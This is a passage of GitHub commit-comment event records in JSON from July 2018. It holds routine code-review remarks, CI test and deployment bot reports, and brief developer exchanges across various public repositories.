<https://github.com/notifications/unsubscribe-auth/ALgM6Ot2QgXg0cha3oCorHnrytaRpivNks5uFkAXgaJpZM4VLm2O>.\n> \n\n"}},"created_at":"2018-07-11T18:15:42Z"}
{"id":"7951780393","type":"CommitCommentEvent","actor":{"login":"nirbhayc"},"repo":{"name":"bloomberg/comdb2"},"payload":{"comment":{"id":29674999,"position":18,"line":822,"path":"tests/tunables.test/t00_all_tunables.expected","commit_id":"f40a20b823d5289ad69036cc621f9ab1bcd42af3","created_at":"2018-07-11T18:16:34Z","updated_at":"2018-07-11T18:16:34Z","author_association":"COLLABORATOR","body":"BOOLEAN?"}},"created_at":"2018-07-11T18:16:34Z"}
{"id":"7951783600","type":"CommitCommentEvent","actor":{"login":"nirbhayc"},"repo":{"name":"bloomberg/comdb2"},"payload":{"comment":{"id":29675011,"position":10,"line":474,"path":"tests/tunables.test/t00_all_tunables.expected","commit_id":"f40a20b823d5289ad69036cc621f9ab1bcd42af3","created_at":"2018-07-11T18:17:13Z","updated_at":"2018-07-11T18:17:13Z","author_association":"COLLABORATOR","body":"What's the unit?"}},"created_at":"2018-07-11T18:17:13Z"}
{"id":"7951785321","type":"CommitCommentEvent","actor":{"login":"ia3andy"},"repo":{"name":"fabric8-launcher/demo-cloud-app-creator"},"payload":{"comment":{"id":29675014,"position":5,"line":8,"path":"src/components/TemplateItem.js","commit_id":"70f2d66f00275502af8c10677ec89b0de4e46e7f","created_at":"2018-07-11T18:17:33Z","updated_at":"2018-07-11T18:17:33Z","author_association":"COLLABORATOR","body":"Yes that’s how you should do it, I’ll add per component style tomoz to show u how it works.."}},"created_at":"2018-07-11T18:17:33Z"}
{"id":"7951788851","type":"CommitCommentEvent","actor":{"login":"andrzej3393"},"repo":{"name":"RKJO/room_app"},"payload":{"comment":{"id":29675022,"position":71,"line":243,"path":"room_service/room_rents/views.py","commit_id":"f21b83478171763bd92a5f97eba15519cb400cfb","created_at":"2018-07-11T18:18:16Z","updated_at":"2018-07-11T18:18:16Z","author_association":"COLLABORATOR","body":"Hej, jesteś pewien że wrzuciłeś wszystkie pliki do repozytorium? Nie mogę uruchomić aplikacji u siebie :|"}},"created_at":"2018-07-11T18:18:16Z"}
{"id":"7951795257","type":"CommitCommentEvent","actor":{"login":"jdeurt"},"repo":{"name":"jdeurt/Intel"},"payload":{"comment":{"id":29675034,"position":7,"line":7,"path":"src/modules/structures/Player.ts","commit_id":"7087e39f593a5e9f42d7362c08796a8ec221033b","created_at":"2018-07-11T18:19:34Z","updated_at":"2018-07-11T18:19:34Z","author_association":"OWNER","body":"That's up to you but I'd imagine making it their SteamID would be the best approach."}},"created_at":"2018-07-11T18:19:34Z"}
{"id":"7951797993","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29675041,"position":null,"line":null,"path":null,"commit_id":"11ce47f3defa98a3c65ec2eb401c2d2997236458","created_at":"2018-07-11T18:20:11Z","updated_at":"2018-07-11T18:20:11Z","author_association":"MEMBER","body":"It's just a dummy class. There's nothing special about it. "}},"created_at":"2018-07-11T18:20:11Z"}
{"id":"7951801713","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29675049,"position":null,"line":null,"path":null,"commit_id":"04ad2bcff201f0ac5a19d3c6b416c6a54914567e","created_at":"2018-07-11T18:20:57Z","updated_at":"2018-07-11T18:20:57Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - x86_64-MacOS-10.9-clang: Tests Failed (1386 of 2934 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 625\n\nregression Test Summary\n * Passed: 622\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.24%25-red.png)</a> \n"}},"created_at":"2018-07-11T18:20:57Z"}
{"id":"7951802999","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29675052,"position":null,"line":null,"path":null,"commit_id":"e8ba1e0a1e8147638d02ca554835bdf7acd1913e","created_at":"2018-07-11T18:21:13Z","updated_at":"2018-07-11T18:21:13Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-182101 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-182101\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T18:21:13Z"}
{"id":"7951803132","type":"CommitCommentEvent","actor":{"login":"al177"},"repo":{"name":"al177/hc12pj"},"payload":{"comment":{"id":29675053,"position":null,"line":null,"path":null,"commit_id":"071d1b74b31eda43b25e0c1f84b9c4befbb22f3d","created_at":"2018-07-11T18:21:15Z","updated_at":"2018-07-11T18:21:15Z","author_association":"OWNER","body":"Hi Ivan,\r\n\r\nThis project is built with SDCC.  See the Makefile for hints.  However keep in mind this is incomplete and hasn't been tested at all, and I've abandoned the project.  I hope you can get some use out of it, but don't expect anything to work."}},"created_at":"2018-07-11T18:21:15Z"}
{"id":"7951804874","type":"CommitCommentEvent","actor":{"login":"jdeurt"},"repo":{"name":"jdeurt/Intel"},"payload":{"comment":{"id":29675058,"position":16,"line":16,"path":"src/modules/structures/Player.ts","commit_id":"7087e39f593a5e9f42d7362c08796a8ec221033b","created_at":"2018-07-11T18:21:35Z","updated_at":"2018-07-11T18:21:35Z","author_association":"OWNER","body":"Makes sense. I'll implement that real quick."}},"created_at":"2018-07-11T18:21:35Z"}
{"id":"7951805437","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29675060,"position":59,"line":1213,"path":"pom.xml","commit_id":"7e3b76fb02921aefad60968044e139eced036037","created_at":"2018-07-11T18:21:42Z","updated_at":"2018-07-11T18:21:42Z","author_association":"CONTRIBUTOR","body":"IMO, to be useful it should be defined into the project properties like:\r\n```\r\n<nsis.compression.type>lzma</nsis.compression.type>\r\n<nsis.dictionary.size>64</nsis.dictionary.size>\r\n```\r\n\r\nBecause that way it will be easily changeable from the command line without having to modify the code.\r\nThen for the plugin` ${nsis.compression.type}` and `${nsis.dictionary.size}` could be used.\r\n\r\nIt was just my 2 cents."}},"created_at":"2018-07-11T18:21:42Z"}
{"id":"7951810422","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675066,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-11T18:22:38Z","updated_at":"2018-07-11T18:22:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:22:38Z"}
{"id":"7951811618","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675068,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-11T18:22:53Z","updated_at":"2018-07-11T18:22:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:22:53Z"}
{"id":"7951811773","type":"CommitCommentEvent","actor":{"login":"kk4466345"},"repo":{"name":"kk4466345/hello-world"},"payload":{"comment":{"id":29675069,"position":5,"line":5,"path":"helloworld.c","commit_id":"8e3c87e74d42b5e62b2c031c5a13ad6d83ffecbc","created_at":"2018-07-11T18:22:55Z","updated_at":"2018-07-11T18:22:55Z","author_association":"OWNER","body":"kmk"}},"created_at":"2018-07-11T18:22:55Z"}
{"id":"7951816060","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675082,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-11T18:23:47Z","updated_at":"2018-07-11T18:23:47Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:23:47Z"}
{"id":"7951817496","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675084,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-11T18:24:04Z","updated_at":"2018-07-11T18:24:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:24:04Z"}
{"id":"7951821592","type":"CommitCommentEvent","actor":{"login":"rbdoggithub"},"repo":{"name":"rbdoggithub/chefstack"},"payload":{"comment":{"id":29675097,"position":null,"line":null,"path":null,"commit_id":"772c7c0ef7c7d08497d58124b0fa87b2d57d3ac3","created_at":"2018-07-11T18:24:53Z","updated_at":"2018-07-11T18:24:53Z","author_association":"OWNER","body":"lat merge"}},"created_at":"2018-07-11T18:24:53Z"}
{"id":"7951821933","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675098,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-11T18:24:57Z","updated_at":"2018-07-11T18:24:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:24:57Z"}
{"id":"7951822075","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29675099,"position":null,"line":null,"path":null,"commit_id":"c0bc1c4468ef5e4ac31bdfbd410329c632996f00","created_at":"2018-07-11T18:24:58Z","updated_at":"2018-07-11T18:24:58Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-182457 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-182457\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T18:24:58Z"}
{"id":"7951822118","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29675100,"position":null,"line":null,"path":null,"commit_id":"c0bc1c4468ef5e4ac31bdfbd410329c632996f00","created_at":"2018-07-11T18:24:59Z","updated_at":"2018-07-11T18:24:59Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-182457 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-182457\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T18:24:59Z"}
{"id":"7951823130","type":"CommitCommentEvent","actor":{"login":"ararslan"},"repo":{"name":"JuliaStats/StatsBase.jl"},"payload":{"comment":{"id":29675103,"position":2,"line":1,"path":"REQUIRE","commit_id":"7011b19028c0aa0ce2e7751ff926c1a381883b6b","created_at":"2018-07-11T18:25:13Z","updated_at":"2018-07-11T18:25:13Z","author_association":"MEMBER","body":"This is a lower bound, so 0.7.0-alpha and anything newer than that, including the beta, is supported."}},"created_at":"2018-07-11T18:25:13Z"}
{"id":"7951840732","type":"CommitCommentEvent","actor":{"login":"lpshruthi"},"repo":{"name":"lpshruthi/my-website"},"payload":{"comment":{"id":29675157,"position":4,"line":10,"path":"README.md","commit_id":"dd43f73d139d83ce3bcad158eb1ebf38f9ec85ca","created_at":"2018-07-11T18:28:42Z","updated_at":"2018-07-11T18:28:42Z","author_association":"OWNER","body":"hi there "}},"created_at":"2018-07-11T18:28:42Z"}
{"id":"7951841586","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"leedyrj/book-list-exercise"},"payload":{"comment":{"id":29675158,"position":null,"line":null,"path":null,"commit_id":"353d4131eeee82c80eb14a2cdc443d9aac42000c","created_at":"2018-07-11T18:28:52Z","updated_at":"2018-07-11T18:28:52Z","author_association":"NONE","body":"This is close to perfect!  You've got all but the edit (checkbox is a kind of edit too) working great! Keep up the good work."}},"created_at":"2018-07-11T18:28:52Z"}
{"id":"7951841611","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675159,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-11T18:28:52Z","updated_at":"2018-07-11T18:28:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:28:52Z"}
{"id":"7951841951","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29675161,"position":130,"line":114,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T18:28:56Z","updated_at":"2018-07-11T18:28:56Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-11T18:28:56Z"}
{"id":"7951841952","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29675160,"position":68,"line":42,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-11T18:28:56Z","updated_at":"2018-07-11T18:28:56Z","author_association":"OWNER","body":"Thank @xavierlepretre for your comments. What I understand that the code comments are not required right ?"}},"created_at":"2018-07-11T18:28:56Z"}
{"id":"7951842740","type":"CommitCommentEvent","actor":{"login":"nlv-nki"},"repo":{"name":"js-tasks-ru/js-20180619_nki"},"payload":{"comment":{"id":29675166,"position":16,"line":18,"path":"5-module/1-task/index.js","commit_id":"11191d7dc893dc36d9b7ee07051d76f7ea741bc7","created_at":"2018-07-11T18:29:07Z","updated_at":"2018-07-11T18:29:07Z","author_association":"CONTRIBUTOR","body":"На какой строчке? "}},"created_at":"2018-07-11T18:29:07Z"}
{"id":"7951843646","type":"CommitCommentEvent","actor":{"login":"nlv-nki"},"repo":{"name":"js-tasks-ru/js-20180619_nki"},"payload":{"comment":{"id":29675172,"position":30,"line":32,"path":"5-module/1-task/index.js","commit_id":"11191d7dc893dc36d9b7ee07051d76f7ea741bc7","created_at":"2018-07-11T18:29:18Z","updated_at":"2018-07-11T18:29:18Z","author_association":"CONTRIBUTOR","body":"ок"}},"created_at":"2018-07-11T18:29:18Z"}
{"id":"7951845175","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675175,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-11T18:29:37Z","updated_at":"2018-07-11T18:29:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:29:37Z"}
{"id":"7951847293","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675179,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-11T18:30:03Z","updated_at":"2018-07-11T18:30:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:30:03Z"}
{"id":"7951847547","type":"CommitCommentEvent","actor":{"login":"os72"},"repo":{"name":"os72/protoc-jar-maven-plugin"},"payload":{"comment":{"id":29675180,"position":null,"line":null,"path":null,"commit_id":"6c43e6d229389b3d5e47f8a6e83635d7474bcbe9","created_at":"2018-07-11T18:30:06Z","updated_at":"2018-07-11T18:30:06Z","author_association":"OWNER","body":"For issue #31 "}},"created_at":"2018-07-11T18:30:06Z"}
{"id":"7951847718","type":"CommitCommentEvent","actor":{"login":"jezdez"},"repo":{"name":"jazzband/django-configurations"},"payload":{"comment":{"id":29675182,"position":11,"line":240,"path":"docs/values.rst","commit_id":"1c6fd0f505ca9ce6ed71ea44d92a97ec60a9befc","created_at":"2018-07-11T18:30:08Z","updated_at":"2018-07-11T18:30:08Z","author_association":"MEMBER","body":"@blueyed Please add `.. versionadded:: 2.1` here so we can track it in the docs."}},"created_at":"2018-07-11T18:30:08Z"}
{"id":"7951850902","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675191,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-11T18:30:45Z","updated_at":"2018-07-11T18:30:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:30:45Z"}
{"id":"7951853422","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675199,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-11T18:31:17Z","updated_at":"2018-07-11T18:31:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:31:17Z"}
{"id":"7951855634","type":"CommitCommentEvent","actor":{"login":"KyleAMathews"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29675201,"position":13,"line":524,"path":"docs/docs/migrating-from-v1-to-v2.md","commit_id":"a3b2d7c1dfb5076deebc46ed77664e84880c17b8","created_at":"2018-07-11T18:31:44Z","updated_at":"2018-07-11T18:31:44Z","author_association":"CONTRIBUTOR","body":"Maybe say \"Explcit query names no longer required\"? Just to be clear it's an optional step for migration."}},"created_at":"2018-07-11T18:31:44Z"}
{"id":"7951856555","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675203,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-11T18:31:56Z","updated_at":"2018-07-11T18:31:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:31:56Z"}
{"id":"7951856685","type":"CommitCommentEvent","actor":{"login":"speedy-1702"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":29675204,"position":null,"line":null,"path":null,"commit_id":"d48b4a67639202e6fdc8599740ad68619034a2b4","created_at":"2018-07-11T18:31:58Z","updated_at":"2018-07-11T18:31:58Z","author_association":"NONE","body":"Works fine. Thank you. "}},"created_at":"2018-07-11T18:31:58Z"}
{"id":"7951859233","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675208,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-11T18:32:29Z","updated_at":"2018-07-11T18:32:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment 